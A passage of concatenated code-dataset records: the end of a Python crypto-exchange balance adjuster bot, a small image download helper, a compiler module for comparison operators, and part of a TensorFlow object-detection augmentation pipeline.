intermediate_coin_amount = coin_amount / pair1_price * (1 + fee1/100)\n buyback_order_amount1 = abs(intermediate_coin_amount)\n elif coin_amount > 0:\n buyback_order_side1 = 'buy'\n pair1_price = Decimal(str(order_book1[1][0]))\n intermediate_coin_amount = coin_amount / pair1_price * (1 - fee1/100)\n buyback_order_amount1 = intermediate_coin_amount\n\n pair2, fee2 = fees[1]\n buyback_order_side2 = ''\n buyback_order_amount2 = Decimal(0)\n target_coin_position_in_pair = 1 if pair2.find(self._target_coin) == 0 else 2\n order_book2 = self._exchanges.get(exchange).fetch_order_book(pair2, 1)\n pair2_price = Decimal(0)\n # Return None if price isn't initiated yet\n if order_book2 == (None, None):\n return False, Decimal(0), ()\n\n if target_coin_position_in_pair == 1:\n if intermediate_coin_amount < 0:\n buyback_order_side2 = 'sell'\n pair2_price = Decimal(str(order_book2[0][0]))\n target_coin_amount = intermediate_coin_amount / pair2_price * (1 + fee2/100)\n buyback_order_amount2 = abs(target_coin_amount)\n elif intermediate_coin_amount > 0:\n pair2_price = Decimal(str(order_book2[1][0]))\n buyback_order_side2 = 'buy'\n target_coin_amount = intermediate_coin_amount / pair2_price * (1 - fee2/100)\n buyback_order_amount2 = target_coin_amount\n elif target_coin_position_in_pair == 2:\n buyback_order_amount2 = abs(intermediate_coin_amount)\n if intermediate_coin_amount < 0:\n buyback_order_side1 = 'buy'\n pair2_price = Decimal(str(order_book2[1][0]))\n target_coin_amount = intermediate_coin_amount * pair2_price * (1 + fee2/100)\n elif intermediate_coin_amount > 0:\n buyback_order_side2 = 'sell'\n pair2_price = Decimal(str(order_book2[0][0]))\n target_coin_amount = intermediate_coin_amount * pair2_price * (1 - fee2/100)\n order_info = ((pair1, buyback_order_side1, buyback_order_amount1, pair1_price), (pair2, buyback_order_side2, buyback_order_amount2, pair2_price))\n return True, target_coin_amount, order_info\n\n \"\"\"\n Check for all coin adjuster if they can be buyback and still have profit \n \"\"\"\n def _adjuster_check(self):\n accumulate_amount_of_target_coin = Decimal(0)\n for coin_fee_pair, value in self._adjuster_coins_in_total.items():\n if coin_fee_pair[0] != self._target_coin:\n status, target_coin_buyback_amount, buyback_order_input = self._get_target_coin_amount_from_coin(coin_fee_pair)\n #self._log('{} {} {}'.format(coin_fee_pair[0], target_coin_buyback_amount, buyback_order_input))\n if not 
status:\n self._log('balance_adjuster_botmom---235Not status {}'.format(coin_fee_pair[0]), severity='error')\n return False\n # (coin, fee, pair): [start, end, adjuster_amount, order_info_adjuster]\n self._adjuster_coins_in_total[coin_fee_pair][-1] = buyback_order_input\n accumulate_amount_of_target_coin += target_coin_buyback_amount\n else:\n accumulate_amount_of_target_coin += value[2]\n self._socketdata.update({'TOTAL_MARGIN': float(accumulate_amount_of_target_coin)})\n log('Total margin in target coin: {}'.format(float(accumulate_amount_of_target_coin)), console=False)\n if accumulate_amount_of_target_coin > self._threshold:\n return True\n return False\n\n def _cancel_opening_orders_then_buyback(self):\n coin_list = [k[0] for k in self._adjuster_coins_in_total.keys()]\n for ex_obj in self._exchanges.values():\n ex_obj.cancel_all_open_orders(coin_list)\n for coin_fee_pair, value in self._adjuster_coins_in_total.items():\n if coin_fee_pair[0] == self._target_coin:\n continue\n # (coin, fee, pair): [start, end, adjuster_amount, order_info_adjuster]\n if value[-2] != 0:\n # Direct pair\n if coin_fee_pair[-1]:\n pair, side, amount, price = value[-1]\n ex = pair[:3]\n pair = pair[3:]\n self._exchanges.get(ex).create_order(pair, 'limit', side, float(amount), float(price))\n # TODO later Indirect pair, must have intermediate\n else:\n for order_info in coin_fee_pair[-1]:\n pair, side, amount, price = order_info\n ex = pair[:3]\n pair = pair[3:]\n self._exchanges.get(ex).create_order(pair, 'limit', side, float(amount), float(price))\n\n\n def _balances_snapshot(self, at):\n if at == 'start': \n position = 0\n elif at == 'end':\n position = 1\n\n # Reset total counter before update\n for _, couters in self._adjuster_coins_in_total.items():\n couters[position] = 0\n\n for ex, coin_info in self._adjuster_coins.items():\n cur_balances = self._exchanges.get(ex).fetch_balance()\n # self._adjuster_coins_in_total: {(coin, fee, pair): [start, end, adjuster_amount, order_info_adjuster]}\n #self._log('coin_info {}'.format(coin_info))\n for coin, _ in coin_info.items():\n if not cur_balances:\n continue\n if not cur_balances.get(coin):\n continue\n cur_balance = Decimal(str(cur_balances.get(coin).get('total')))\n self._adjuster_coins[ex][coin][position] = cur_balance\n if at == 'end':\n start_balance = self._adjuster_coins[ex][coin][0]\n self._adjuster_coins[ex][coin][2] = cur_balance - start_balance\n\n coin_fee_pair = ()\n for item in self._adjuster_coins_in_total.keys():\n if coin == item[0]:\n coin_fee_pair = item\n break\n\n exist_amount = self._adjuster_coins_in_total.get(coin_fee_pair)[position]\n new_amount = exist_amount + cur_balance\n self._adjuster_coins_in_total[coin_fee_pair][position] = new_amount\n if at == 'end':\n for coin_fee_pair in self._adjuster_coins_in_total.keys():\n start_total_balance = self._adjuster_coins_in_total[coin_fee_pair][0]\n cur_total_balance = self._adjuster_coins_in_total[coin_fee_pair][1]\n self._adjuster_coins_in_total[coin_fee_pair][2] = cur_total_balance - start_total_balance\n\n self._socketdata = {}\n adjuster_coins_data = self._adjuster_coins.copy()\n for ex, coin_info in adjuster_coins_data.items():\n coin_dict = {}\n for coin, values in coin_info.items():\n coin_dict.update({coin: [float(e) if isinstance(e, Decimal) else e for e in values]})\n self._socketdata.update({ex: coin_dict})\n self._socketdata.update({'TOTAL': []})\n self._socketdata.update({'TOTAL_MARGIN': 0})\n\n print_out = 'EXCHAGES INFO\\n'\n for ex, coin_info_list in 
self._adjuster_coins.items():\n print_out += '{}\\n'.format(ex)\n for k, v in coin_info_list.items():\n print_out += '\\t{}\\t{}\\n'.format(k, [float(e) if isinstance(e, Decimal) else e for e in v])\n log(print_out, console=False)\n print_out = '\\nTOTAL INFO\\n'\n for k, v in self._adjuster_coins_in_total.items():\n value = [float(e) if isinstance(e, Decimal) else e for e in v[:-1]]\n self._socketdata['TOTAL'].append({k[0]: value})\n print_out += '\\t{}\\t{}\\n'.format(k[0], value)\n log(\"{}+++++++Balance checking at {} interval++++++++++\".format(print_out, at), console=False)\n\n\n def _find_pair_in_exchange(self, coin1, coin2):\n pair = None\n # Exception case for 'USD' on KRA\n if coin1 == 'USD' or coin2 == 'USD':\n exchange_id = 'KRA'\n else:\n exchange_id = self._buyback_exchange\n market_pairs = [i.get('symbol') for i in self._exchanges.get(exchange_id).api.fetch_markets()]\n pair1 = \"{}/{}\".format(coin1, coin2)\n pair2 = \"{}/{}\".format(coin2, coin1)\n if pair1 in market_pairs:\n pair = pair1\n elif pair2 in market_pairs:\n pair = pair2\n # ee.g. KRAUSDT/USD or BINBTC/USDT\n return exchange_id + pair\n\n def bot_entry(self, web_inputs=None):\n socketio = None\n channel_uuid = ''\n if web_inputs:\n self._socketio = web_inputs.get('socketio')\n socketio = self._socketio\n self._channel_uuid = web_inputs.get('uuid')\n channel_uuid = self._channel_uuid\n self._logger = logging.getLogger(channel_uuid)\n\n self._args = arg_parser(web_inputs)\n self._target_coin = self._args.get('target_coin')\n self._buyback_exchange = self._args.get('buyback_exchange')\n self._buyback = self._args.get('buyback')\n self._threshold = self._args.get('threshold')\n checking_interval = self._args.get('checking_interval')\n ex_and_coin_fee_dict = self._args.get('ex_and_coin_fee')\n\n # Config logger\n self._config_logger()\n\n self._log('START THE BALANCE_ADJUSTER_BOT, INITIALIZING...')\n timer_thread = None\n for exchange_id in ex_and_coin_fee_dict:\n api_file_no = 0\n ex_id = exchange_id\n api_name = ''\n if re.match(r\"^.*\\d$\", ex_id):\n api_file_no = ex_id[-1]\n if ex_id[:-1] == 'BI':\n ex_id = 'BIN'\n elif ex_id[:-1] == 'KR':\n ex_id = 'KRA'\n if '1' == str(api_file_no):\n api_name = self._args.get('account_sell_buy')\n elif '2' == str(api_file_no):\n api_name = self._args.get('account_buy_sell')\n\n exchange_obj = exchange(ex_id, api_name=api_name, own_username=self._args.get('own_username'), api_from_file=api_file_no)\n self._exchanges.update({exchange_id: exchange_obj})\n\n # Initial adjuster list of coins, each item has format: exchang_id: {coin: [start, end, adjuster_amount]}\n # self._adjuster_coins_in_total: {(coin, fee, pair): [start, end, adjuster_amount, order_info_adjuster]}\n for ex, coin_fee_list in ex_and_coin_fee_dict.items():\n self._adjuster_coins.update({ex: {}})\n for coin, fee in coin_fee_list:\n if coin == self._target_coin:\n self._adjuster_coins[ex].update({coin: [Decimal(0), Decimal(0), Decimal(0)]})\n self._adjuster_coins_in_total.update({(coin, fee, None): [Decimal(0), Decimal(0), Decimal(0), ()]})\n continue\n pair = self._find_pair_in_exchange(self._target_coin, coin)\n if pair:\n if coin == 'USD':\n exchange_id = 'KRA'\n else:\n exchange_id = pair[:3]\n self._exchanges.get(exchange_id).register_order_book(pair[3:])\n self._adjuster_coins[ex].update({coin: [Decimal(0), Decimal(0), Decimal(0)]})\n if coin not in [i[0] for i in self._adjuster_coins_in_total.keys()]:\n self._adjuster_coins_in_total.update({(coin, fee, pair): [Decimal(0), Decimal(0), Decimal(0), ()]})\n 
else:\n # TODO later. There is no direct pair for the coin and target coin, it must have intermediate coin\n info = coin[1][1:-1].split('+')\n intermediate_coin = info[0]\n pair1 = self._find_pair_in_exchange(intermediate_coin, coin[0])\n pair2 = self._find_pair_in_exchange(intermediate_coin, self._target_coin)\n if not pair1 or not pair2:\n self._log(\"balance_adjuster_botmom---420Couldn't find pair for {} {} {}\".format(intermediate_coin, coin[0], self._target_coin), severity='error')\n self._exchanges.get(ex).register_order_book(pair1)\n self._exchanges.get(ex).register_order_book(pair2)\n fees = ((pair1, info[1]), (pair2, info[2]))\n self._adjuster_coins[ex].update({(coin[0], fees, None): [Decimal(0), Decimal(0), Decimal(0)]})\n\n # Take START balances snapshot\n self._balances_snapshot(at='start')\n socket_emit(self._socketdata, self._socketio, self._channel_uuid, 'log_one_way_balance')\n while not self._terminate:\n time.sleep(checking_interval * 60)\n # Take END balances snapshot\n self._balances_snapshot(at='end')\n check_flag = self._adjuster_check()\n socket_emit(self._socketdata, self._socketio, self._channel_uuid, 'log_one_way_balance')\n if check_flag and self._buyback:\n self._log('balance_adjuster_botmom---436**************SIGNAL, ADJUSTING BALANCE ...')\n self._cancel_opening_orders_then_buyback()\n log(\"-------------------------------------------------------------------------------------------------------------\", console=False)\n\n # end while\n if timer_thread:\n timer_thread.join()\n self._log(\"balance_adjuster_botmom---443BALANCE_ADJUSTER_BOT EXIT!\")\n # end bot_entry mothod\n# end balance_adjuster_bot class\n\n\nif __name__ == \"__main__\":\n a_bot = balance_adjuster_bot()\n a_bot.bot_entry()\n os._exit(0)\n","repo_name":"codepritesh/saastoolfeb","sub_path":"bots/balance_adjuster_bot.py","file_name":"balance_adjuster_bot.py","file_ext":"py","file_size_in_byte":21843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21075289395","text":"# -*- coding: utf-8 -*-\n# -*- mode: python -*-\nimport os\n\ndef get_img(net, url):\n img = net.req(url)\n return img\n\ndef save_img(fobj, fpath, tmppath='temp'):\n ipath = os.path.join(tmppath, fpath)\n ipath = ipath.rstrip('/')\n if not os.path.isfile(ipath):\n dpath = os.path.dirname(ipath)\n if not os.path.isdir(dpath):\n os.makedirs(dpath)\n with open(ipath, 'wb') as f:\n f.write(fobj)\n return ipath\n\ndef download_img(net, url, tmppath='temp'):\n img = get_img(net, url)\n return save_img(img, url.partition('://')[2], tmppath)\n","repo_name":"waipu/bakawipe","sub_path":"lib/ocr/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31598071555","text":"from smartanthill_zc import node, expression\nfrom smartanthill_zc.lookup import RootScope\nfrom smartanthill_zc.node import ParameterListNode, Node, ResolutionHelper\n\n\nclass OperatorDeclNode(Node, ResolutionHelper):\n\n '''\n Node class to represent an operator declaration\n '''\n\n def __init__(self, operator, type_name):\n '''\n Constructor\n '''\n super(OperatorDeclNode, self).__init__()\n self.child_parameter_list = None\n self.txt_operator = operator\n self.txt_type_name = type_name\n\n def set_parameter_list(self, child):\n '''\n parameter_list setter\n '''\n assert isinstance(child, ParameterListNode)\n child.set_parent(self)\n self.child_parameter_list = child\n\n def 
do_resolve_declaration(self, compiler):\n '''\n Template method from ResolutionHelper\n '''\n compiler.resolve_node(self.child_parameter_list)\n\n scope = self.get_scope(RootScope)\n scope.add_operator(compiler, self.txt_operator, self)\n\n return scope.lookup_type(self.txt_type_name)\n\n def static_evaluate(self, compiler, expr, arg_list):\n '''\n Do static evaluation of expressions when possible\n '''\n # pylint: disable=no-self-use\n # pylint: disable=unused-argument\n return None\n\n_negate_comparison_map = {'==': '!=',\n '!=': '==',\n '<': '>=',\n '>': '<=',\n '<=': '>',\n '>=': '<'}\n\n\ndef negate_comparison(txt_op, negate):\n '''\n If negate is False, returns the same txt_op,\n If negate is True, return the negated comparison operator\n '''\n\n if negate:\n return _negate_comparison_map[txt_op]\n else:\n return txt_op\n\n\n_negate_logic_map = {'!': '!',\n '&&': '||',\n '||': '&&'}\n\n\ndef negate_logic(txt_op, negate):\n '''\n If negate is False, returns the same txt_op,\n If negate is True, return the negated logic operator\n '''\n\n if negate:\n return _negate_logic_map[txt_op]\n else:\n return txt_op\n\n\n_swap_comparison_map = {'==': '==',\n '!=': '!=',\n '<': '>',\n '>': '<',\n '<=': '>=',\n '>=': '<='}\n\n\ndef swap_comparison(txt_op, swap):\n '''\n If swap is False, returns the same txt_op,\n If swap is True, return the comparison operator needed to swap lhs y rhs\n '''\n\n if swap:\n return _swap_comparison_map[txt_op]\n else:\n return txt_op\n\n\ndef simplify_comparison(txt_op, value, value_type):\n\n if txt_op in ['==', '!=']: # TODO really want to support == and != ?\n return (txt_op, value)\n elif txt_op == '<':\n return ('<', value_type.round_up(value))\n elif txt_op == '>':\n return ('>', value_type.round_down(value))\n elif txt_op == '<=':\n return ('<', value_type.next_up(value))\n elif txt_op == '>=':\n return ('>', value_type.next_down(value))\n else:\n assert False\n\n\ndef create_number_to_literal_comparison(compiler, ctx, root, operator_list):\n\n for current in operator_list:\n op = compiler.init_node(\n NumberToLiteralCompDeclNode(current, '_zc_boolean'), ctx)\n op.set_parameter_list(\n node.create_parameter_list(compiler, ctx,\n ['_zc_number', '_zc_number_literal']))\n root.add_declaration(op)\n\n op2 = compiler.init_node(\n NumberToLiteralCompDeclNode(current, '_zc_boolean'), ctx)\n op2.set_parameter_list(\n node.create_parameter_list(compiler, ctx,\n ['_zc_number_literal', '_zc_number']))\n op2.swap_flag = True\n root.add_declaration(op2)\n\n\nclass NumberToLiteralCompDeclNode(OperatorDeclNode):\n\n '''\n Node class to represent an special operator declaration\n for comparison between number and number literal\n This comparison is special because it is translated into specific\n ZEPTOVM_OP_JMPIFEXPR_XX operations\n '''\n\n def __init__(self, operator, type_name):\n '''\n Constructor\n '''\n super(NumberToLiteralCompDeclNode, self).__init__(\n operator, type_name)\n self.swap_flag = False\n\n def static_evaluate(self, compiler, expr, arg_list):\n '''\n Do replace generic ComparisonOpExprNode by a much more specific\n NumberToLiteralCompExprNode\n '''\n\n assert isinstance(expr, expression.ComparisonOpExprNode)\n assert len(expr.child_argument_list.childs_arguments) == 2\n\n result = compiler.init_node(NumberToLiteralCompExprNode(), expr.ctx)\n result.set_argument_list(expr.child_argument_list)\n result.ref_decl = self\n\n compiler.remove_node(expr)\n\n result.set_type(self.get_type())\n\n return result\n\n\nclass 
NumberToLiteralCompExprNode(node.ExpressionNode):\n\n '''\n Node class representing an special operator comparison expression\n between a number and a number literal.\n This kind of expression is created from a regular ComparisonOpExprNode\n by NumberToLiteralCompDeclNode for all expressions that match\n This allows easier detection of this special comparison at a later time\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n super(NumberToLiteralCompExprNode, self).__init__()\n self.child_argument_list = None\n self.ref_decl = None\n\n def set_argument_list(self, child):\n '''\n argument_list setter\n '''\n assert isinstance(child, node.ArgumentListNode)\n child.set_parent(self)\n self.child_argument_list = child\n\n def get_expression(self):\n assert len(self.child_argument_list.childs_arguments) == 2\n\n i = 0 if not self.ref_decl.swap_flag else 1\n return self.child_argument_list.childs_arguments[i]\n\n def get_literal(self):\n assert len(self.child_argument_list.childs_arguments) == 2\n\n i = 1 if not self.ref_decl.swap_flag else 0\n return self.child_argument_list.childs_arguments[i]\n\n def get_subcode_and_threshold(self, negate):\n '''\n simplify >= and <= to < and > by modifying literal value by epsilon\n Also apply an optional negation flag, as helper for code generator,\n since normally if body is executed when condition is true,\n but at implementation, body is jumped when condition is false\n '''\n\n op = swap_comparison(\n self.ref_decl.txt_operator, self.ref_decl.swap_flag)\n\n op = negate_comparison(op, negate)\n\n threshold = self.get_literal().get_static_value()\n assert threshold\n ltype = self.get_expression().get_type()\n\n return simplify_comparison(op, threshold, ltype)\n\n\ndef create_number_to_number_comparison(compiler, ctx, root, operator_list):\n\n for current in operator_list:\n op = compiler.init_node(\n NumberToNumberCompDeclNode(current, '_zc_boolean'), ctx)\n op.set_parameter_list(node.create_parameter_list(compiler, ctx,\n ['_zc_number',\n '_zc_number']))\n root.add_declaration(op)\n\n\nclass NumberToNumberCompDeclNode(OperatorDeclNode):\n\n '''\n Node class to represent an special operator declaration\n for comparison between number and number literal\n This comparison is special because it is translated into specific\n ZEPTOVM_OP_JMPIFEXPR_XX operations\n '''\n\n def __init__(self, operator, type_name):\n '''\n Constructor\n '''\n super(NumberToNumberCompDeclNode, self).__init__(\n operator, type_name)\n\n def static_evaluate(self, compiler, expr, arg_list):\n '''\n Do replace generic ComparisonOpExprNode by a much more specific\n NumberToLiteralCompExprNode\n '''\n\n assert isinstance(expr, expression.ComparisonOpExprNode)\n assert len(expr.child_argument_list.childs_arguments) == 2\n\n result = compiler.init_node(NumberToNumberCompExprNode(), expr.ctx)\n result.set_argument_list(expr.child_argument_list)\n result.ref_decl = self\n\n compiler.remove_node(expr)\n\n result.set_type(self.get_type())\n\n return result\n\n\nclass NumberToNumberCompExprNode(node.ExpressionNode):\n\n '''\n Node class representing an special operator comparison expression\n between a number and a number literal.\n This kind of expression is created from a regular ComparisonOpExprNode\n by NumberToLiteralCompDeclNode for all expressions that match\n This allows easier detection of this special comparison at a later time\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n super(NumberToNumberCompExprNode, self).__init__()\n self.child_argument_list = None\n 
self.ref_decl = None\n\n def set_argument_list(self, child):\n '''\n argument_list setter\n '''\n assert isinstance(child, node.ArgumentListNode)\n child.set_parent(self)\n self.child_argument_list = child\n\n def get_subcode_and_threshold(self, negate):\n '''\n simplify >= and <= to < and > by modifying literal value by epsilon\n Also apply an optional negation flag, as helper for code generator,\n since normally if body is executed when condition is true,\n but at implementation, body is jumped when condition is false\n '''\n op = negate_comparison(self.ref_decl.txt_operator, negate)\n\n ltype = self.child_argument_list.childs_arguments[0].get_type()\n\n return simplify_comparison(op, 0.0, ltype)\n","repo_name":"smartanthill/zepto-compiler","sub_path":"smartanthill_zc/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":9828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"39598675121","text":"import config\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow.keras as keras\nimport tensorflow_datasets as tfds\nfrom utils.util_graph import shrink_and_normalize_boxes, create_reg_positive_sample\n\n_image_size = [512, 640, 768, 896, 1024, 1280, 1408]\n_STRIDES = [8, 16, 32, 64, 128]\n_ALPHA = 0.0\n\n\n@tf.function\ndef _normalization_image(image, mode):\n if mode == 'ResNetV1':\n # Caffe\n image = image[..., ::-1] # RGB -> BGR\n image -= [103.939, 116.779, 123.68]\n\n elif mode == 'ResNetV2':\n image /= 127.5\n image -= 1.\n\n elif mode == 'EffNet':\n image = image\n\n elif mode in ['DenseNet', 'SEResNet']:\n # Torch\n image /= 255.\n image -= [0.485, 0.456, 0.406]\n image /= [0.229, 0.224, 0.225]\n\n return image\n\n\ndef _fmap_shapes(phi: int = 0, level: int = 5):\n _img_size = int(phi * 128) + 512\n _strides = [int(2 ** (x + 3)) for x in range(level)]\n\n shapes = []\n\n for i in range(level):\n fmap_shape = _img_size // _strides[i]\n shapes.append([fmap_shape, fmap_shape])\n\n return shapes\n\n\n@tf.function\ndef random_flip_horizontal(image, image_shape, bboxes, prob=0.5):\n \"\"\"Flips image and boxes horizontally\n\n Arguments:\n image: A 3-D tensor of shape `(height, width, channels)` representing an\n image.\n image_shape:\n bboxes: A tensor with shape `(num_boxes, 4)` representing bounding boxes,\n having normalized coordinates.\n prob: Chance.\n\n Returns:\n Randomly flipped image and boxes\n \"\"\"\n\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.flip_left_right(image)\n bboxes = tf.stack(\n [\n image_shape[1] - bboxes[..., 2] - 1,\n bboxes[..., 1],\n image_shape[1] - bboxes[..., 0] - 1,\n bboxes[..., 3]\n ],\n axis=-1\n )\n return image, bboxes\n\n\n@tf.function\ndef random_rotate(image, image_shape, bboxes, prob=0.5):\n offset = image_shape / 2.\n rotate_k = tf.random.uniform((), minval=1, maxval=4, dtype=tf.int32)\n\n def _r_method(x, y, angle):\n tf_cos = tf.math.cos(angle)\n tf_sin = tf.math.sin(angle)\n\n tf_abs_cos = tf.abs(tf_cos)\n tf_abs_sin = tf.abs(tf_sin)\n\n offset_h, offset_w = offset[0], offset[1]\n\n new_offset_w = offset_w * (tf_abs_cos - tf_cos) + offset_h * (tf_abs_sin - tf_sin)\n new_offset_h = offset_w * (tf_abs_sin + tf_sin) + offset_h * (tf_abs_cos - tf_cos)\n\n x_r = x * tf_cos + y * tf_sin + new_offset_w\n y_r = x * tf_sin * -1 + y * tf_cos + new_offset_h\n\n x_r = tf.round(x_r)\n y_r = tf.round(y_r)\n return x_r, y_r\n\n def _rotate_bbox(bbox):\n # degree: pi/2, pi, 3*pi/2\n angle = tf.cast(rotate_k, dtype=tf.float32) * (np.pi / 2.)\n\n x1, 
y1, x2, y2 = bbox[0], bbox[1], bbox[2], bbox[3]\n\n x1_n, y1_n = _r_method(x1, y1, angle)\n x2_n, y2_n = _r_method(x2, y2, angle)\n\n bbox = tf.stack([\n tf.minimum(x1_n, x2_n),\n tf.minimum(y1_n, y2_n),\n tf.maximum(x1_n, x2_n),\n tf.maximum(y1_n, y2_n)\n ])\n return bbox\n\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.rot90(image, k=rotate_k)\n\n bboxes = tf.map_fn(\n _rotate_bbox,\n elems=bboxes,\n fn_output_signature=tf.float32\n )\n image_shape = tf.cast(tf.shape(image)[:2], tf.float32)\n bboxes = tf.stack(\n [\n tf.clip_by_value(bboxes[:, 0], 0., image_shape[1] - 2), # x1\n tf.clip_by_value(bboxes[:, 1], 0., image_shape[0] - 2), # y1\n tf.clip_by_value(bboxes[:, 2], 1., image_shape[1] - 1), # x2\n tf.clip_by_value(bboxes[:, 3], 1., image_shape[0] - 1), # y2\n bboxes[:, -1]\n ],\n axis=-1\n )\n return image, image_shape, bboxes\n\n\n@tf.function\ndef multi_scale(image, image_shape, bboxes, prob=0.5):\n new_image_shape = image_shape\n\n if tf.random.uniform(()) > (1 - prob):\n # start, end, step = 0.25, 1.3, 0.05\n # scale = np.random.choice(np.arange(start, end, step))\n scale = tf.random.uniform((), minval=0.8, maxval=1.3)\n\n new_image_shape = tf.round(image_shape * scale)\n image = tf.image.resize(\n image,\n tf.cast(new_image_shape, tf.int32),\n method=tf.image.ResizeMethod.BILINEAR\n )\n bboxes = tf.stack(\n [\n tf.clip_by_value(bboxes[..., 0] * scale, 0, new_image_shape[1] - 2),\n tf.clip_by_value(bboxes[..., 1] * scale, 0, new_image_shape[0] - 2),\n tf.clip_by_value(bboxes[..., 2] * scale, 1, new_image_shape[1] - 1),\n tf.clip_by_value(bboxes[..., 3] * scale, 1, new_image_shape[0] - 1),\n ],\n axis=-1\n )\n bboxes = tf.round(bboxes)\n return image, new_image_shape, bboxes\n\n\n@tf.function\ndef random_crop(image, image_shape, bboxes, prob=0.5):\n if tf.random.uniform(()) > (1 - prob):\n min_x1y1 = tf.cast(tf.math.reduce_min(bboxes, axis=0)[:2], tf.int32)\n max_x2y2 = tf.cast(tf.math.reduce_max(bboxes, axis=0)[2:], tf.int32)\n new_image_shape = tf.cast(image_shape, tf.int32)\n\n random_x1 = tf.random.uniform((), minval=0, maxval=tf.maximum(min_x1y1[0] // 2, 1), dtype=tf.int32)\n random_y1 = tf.random.uniform((), minval=0, maxval=tf.maximum(min_x1y1[1] // 2, 1), dtype=tf.int32)\n\n random_x2 = tf.random.uniform(\n (),\n minval=max_x2y2[0] + 1,\n maxval=tf.math.maximum(\n tf.math.minimum(new_image_shape[1], max_x2y2[0] + (new_image_shape[1] - max_x2y2[0]) // 2),\n max_x2y2[0] + 2\n ),\n dtype=tf.int32\n )\n random_y2 = tf.random.uniform(\n (),\n minval=max_x2y2[1] + 1,\n maxval=tf.math.maximum(\n tf.math.minimum(new_image_shape[0], max_x2y2[1] + (new_image_shape[0] - max_x2y2[1]) // 2),\n max_x2y2[1] + 2\n ),\n dtype=tf.int32\n )\n\n image = tf.image.crop_to_bounding_box(\n image,\n offset_height=random_y1,\n offset_width=random_x1,\n target_height=(random_y2 - random_y1),\n target_width=(random_x2 - random_x1)\n )\n\n bboxes = tf.stack(\n [\n bboxes[:, 0] - tf.cast(random_x1, tf.float32),\n bboxes[:, 1] - tf.cast(random_y1, tf.float32),\n bboxes[:, 2] - tf.cast(random_x1, tf.float32),\n bboxes[:, 3] - tf.cast(random_y1, tf.float32),\n ],\n axis=-1\n )\n image_shape = tf.cast(tf.shape(image)[:2], tf.float32)\n\n return image, image_shape, bboxes\n\n\ndef random_image_saturation(image, prob=.5):\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.random_saturation(image, 1, 5)\n\n return image\n\n\ndef random_image_brightness(image, prob=.5):\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.random_brightness(image, 0.8, 1.)\n\n return image\n\n\ndef 
random_image_contrast(image, prob=.5):\n if tf.random.uniform(()) > (1 - prob):\n image = tf.image.random_contrast(image, 0.2, 1.)\n\n return image\n\n\n@tf.function\ndef image_color_augmentation(image):\n ids = int(tf.random.uniform((), minval=0, maxval=3))\n\n if ids == 0:\n image = random_image_saturation(image)\n\n elif ids == 1:\n image = random_image_brightness(image)\n\n elif ids == 2:\n image = random_image_contrast(image)\n\n return image\n\n\n@tf.function\ndef _image_transform(image, target_size=512, padding_value=.0):\n image_height, image_width = tf.shape(image)[0], tf.shape(image)[1]\n\n if image_height > image_width:\n scale = tf.cast((target_size / image_height), dtype=tf.float32)\n resized_height = target_size\n resized_width = tf.cast((tf.cast(image_width, dtype=tf.float32) * scale), dtype=tf.int32)\n else:\n scale = tf.cast((target_size / image_width), dtype=tf.float32)\n resized_height = tf.cast((tf.cast(image_height, dtype=tf.float32) * scale), dtype=tf.int32)\n resized_width = target_size\n\n image = tf.image.resize(\n image,\n (resized_height, resized_width),\n method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n\n offset_h = (target_size - resized_height) // 2\n offset_w = (target_size - resized_width) // 2\n\n # (h, w, c)\n pad = tf.stack(\n [\n tf.stack([offset_h, target_size - resized_height - offset_h], axis=0),\n tf.stack([offset_w, target_size - resized_width - offset_w], axis=0),\n tf.constant([0, 0]),\n ],\n axis=0\n )\n\n image = tf.pad(image, pad, constant_values=padding_value)\n\n return image, scale, [offset_h, offset_w]\n\n\n@tf.function\ndef _bboxes_transform(bboxes, classes, scale, offset_hw, max_bboxes=20, padding=False):\n bboxes *= scale\n bboxes = tf.stack(\n [\n (bboxes[:, 0] + tf.cast(offset_hw[1], dtype=tf.float32)),\n (bboxes[:, 1] + tf.cast(offset_hw[0], dtype=tf.float32)),\n (bboxes[:, 2] + tf.cast(offset_hw[1], dtype=tf.float32)),\n (bboxes[:, 3] + tf.cast(offset_hw[0], dtype=tf.float32)),\n classes\n ],\n axis=-1,\n )\n\n if padding:\n # true_label_count\n bboxes_count = tf.shape(bboxes)[0]\n max_bbox_pad = tf.stack(\n [\n tf.stack([tf.constant(0), max_bboxes - bboxes_count], axis=0),\n tf.constant([0, 0]),\n ],\n axis=0\n )\n bboxes = tf.pad(bboxes, max_bbox_pad, constant_values=0.)\n\n else:\n bboxes_count = tf.shape(bboxes)[0]\n\n return bboxes, bboxes_count\n\n\n@tf.function\ndef _clip_transformed_bboxes(image, bboxes, debug=False):\n image_shape = tf.cast(tf.shape(image)[:2], dtype=tf.float32)\n\n if debug:\n bboxes = tf.stack(\n [\n tf.clip_by_value(bboxes[:, 0] / image_shape[1], 0., 1.), # x1\n tf.clip_by_value(bboxes[:, 1] / image_shape[0], 0., 1.), # y1\n tf.clip_by_value(bboxes[:, 2] / image_shape[1], 0., 1.), # x2\n tf.clip_by_value(bboxes[:, 3] / image_shape[0], 0., 1.), # y2\n bboxes[:, -1]\n ],\n axis=-1\n )\n\n else:\n bboxes = tf.stack(\n [\n tf.clip_by_value(bboxes[:, 0], 0., image_shape[1] - 2), # x1\n tf.clip_by_value(bboxes[:, 1], 0., image_shape[0] - 2), # y1\n tf.clip_by_value(bboxes[:, 2], 1., image_shape[1] - 1), # x2\n tf.clip_by_value(bboxes[:, 3], 1., image_shape[0] - 1), # y2\n bboxes[:, -1]\n ],\n axis=-1\n )\n return bboxes\n\n\n@tf.function\ndef compute_inputs(sample):\n image = tf.cast(sample[\"image\"], dtype=tf.float32)\n image_shape = tf.cast(tf.shape(image)[:2], dtype=tf.float32)\n bboxes = tf.cast(sample[\"objects\"][\"bbox\"], dtype=tf.float32)\n classes = 